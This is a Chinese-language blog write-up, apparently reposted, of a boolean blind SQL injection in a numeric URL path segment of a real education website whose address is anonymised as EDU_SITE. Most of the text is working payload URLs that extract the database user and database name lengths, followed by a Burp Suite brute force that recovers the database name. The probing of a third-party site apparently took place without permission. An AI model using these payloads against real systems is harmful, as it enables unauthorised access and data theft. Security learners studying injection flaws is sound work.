涉及技能點
-
SQL注入基礎原理
-
盲注常用函式及思路
-
burpsuite基礎知識
程序記錄
1.發現
在翻閱一EDU站點時,發現路徑中帶有明顯的數字引數
好像與我們平時習慣的xxx.php?id=不同呃
2.嘗試注入
按照以往習慣,先用order by探探底,結果翻車了…應該有自定義邏輯在過濾敏感關鍵詞,
繼續努力,峰回路轉,耶~~~!
構造boolen等式時能夠被帶入查詢陳述句并顯示不同效果
當條件不符合時,71-false=71,顯示71.html,無資料
http://EDU_SITE/.../..._id/71-false.html
=> SELECT ..FROM .. WHERE ... AND _id=71-false而當條件符合時,71-true=70,顯示70.html,有資料
http://EDU_SITE/.../..._id/71-true.html
=> SELECT ..FROM .. WHERE ... AND _id=71-true3.確定攻擊方式,獲取資料進行驗證
獲取用戶名長度
http://EDU_SITE/.../..._id/71-(length(user())=12).html
=> SELECT ..FROM .. WHERE ... AND _id=71-(length(user())=12)獲取資料庫長度
http://EDU_SITE/.../..._id/71-(length(database())=6).html
=> SELECT ..FROM .. WHERE ... AND _id=71-(length(database())=6)嘗試用burpsuite的clusterboom模式對database進行爆破
其中引數1 為位數,引數2 為可能出現的字符明文
獲得最終database()=db_cms
總結
在嘗試sql注入的時候,往往過分關注get傳參或者post傳參而忽略了URL中自帶的注入點,有時候一些明顯的數字型引數也能夠帶入payload
零基礎從入門到挖漏洞,其實也沒那么難,更多的是找不到適合自己的學習路線,從而踩了不少坑,以及還未形成獨立的滲透思維,不得法門,就算花再多時間也與你無緣,想要學好滲透,最主要的還得是在找到一套對自己有益的教程,打下牢固的基礎,在學習、打靶場的程序中,拓展自己的思維,從而慢慢形成一套自己的滲透思維.
記得舊文章 便是新舉子轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/499080.html
標籤:其他
下一篇:資料結構——光纖網路設計